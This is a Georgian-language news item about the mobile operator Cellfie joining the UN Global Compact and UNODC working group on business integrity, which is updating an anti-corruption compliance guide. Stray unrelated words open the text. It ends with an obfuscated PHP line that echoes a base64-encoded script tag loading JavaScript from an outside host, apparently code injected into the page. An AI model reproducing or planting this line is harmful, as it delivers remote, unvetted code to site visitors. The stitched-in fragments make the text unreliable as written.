celsiusi
ავერსი შნაიდერი

 "სელფი", ქართული მობილური ოპერატორი რომელიც 1.3 მლნ აბონენტზე მეტს ემსახურება, გაეროს გლობალური შეთანხმებისა და UNODC-ის თანამშრომლობით შექმნილი ბიზნესის კეთილსინდისიერების სამუშაო ჯგუფის (Think Lab for Business Integrity) წევრია. ჯგუფში მონაწილეობისთვის მსოფლიოს მასშტაბით შეირჩა სულ 25 კომპანია, მათ შორის ერთადერთი ქართული კომპანია - სელფი. სამუშაო ჯგუფში სელფისწარადგენს კომპანიის ეთიკისა და კომპლაენსის სამსახურის ხელმძღვანელი, ია მამეიშვილი. სელფი ასევე არის გაეროს გლობალური შეთანხმება საქართველოს წევრი.

ინიციატივის მიზანია მდგრადობის კრიტიკულ საკითხებზე მუშაობა საუკეთესო პრაქტიკის განსაზღვრით და ბიზნესისთვის ქმედითი ინსტრუმენტების შემუშავებით. ჯგუფის მუშაობა მიმართულია ანტიკორუფციული ეთიკისა და ბიზნესის შესაბამისობის პროგრამის - პრაქტიკული გზამკვლევის განახლებაზე, მიმდინარე წლის ბოლომდე.

ანტიკორუფციული ეთიკისა და შესაბამისობის სახელმძღვანელოს შემუშავება სხვადასხვა ორგანიზაციის, მათ შორის: IBA, ICC, WEF PACI, TI, ბაზელის მმართველობის ინსტიტუტის და Business and Industry Advisory Committee to the OECD-ის მონაწილეობით, გადაწყდა 2011 წლის მაისში, როდესაც G20-ის ანტიკორუფციულმა სამუშაო ჯგუფმა დავალება მისცა OECD-ს, UNODC-სა და მსოფლიო ბანკს, სხვა შესაბამის ორგანიზაციებთან ერთად, მოეხდინათ არსებული გაიდლაინებისა და კერძო სექტორის ანტიკორუფციული შესაბამისობის შესახებ მასალების კონსოლიდაცია. პრაქტიკული რეკომენდაციების, მათ შორის, ნაბიჯების, მიდგომებისა და მაგალითების ხელმისაწვდომობის უზრუნველსაყოფად, 2013 წელს, UNODC-მა გამოაქვეყნა პრაქტიკული გზამკვლევი, რომელიც მას შემდეგ ფართოდ გამოიყენებოდა და წარმოადგენდა ძირითად დოკუმენტს გლობალური საკანონმდებლო ბაზის შემუშავებისთვის.

221
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");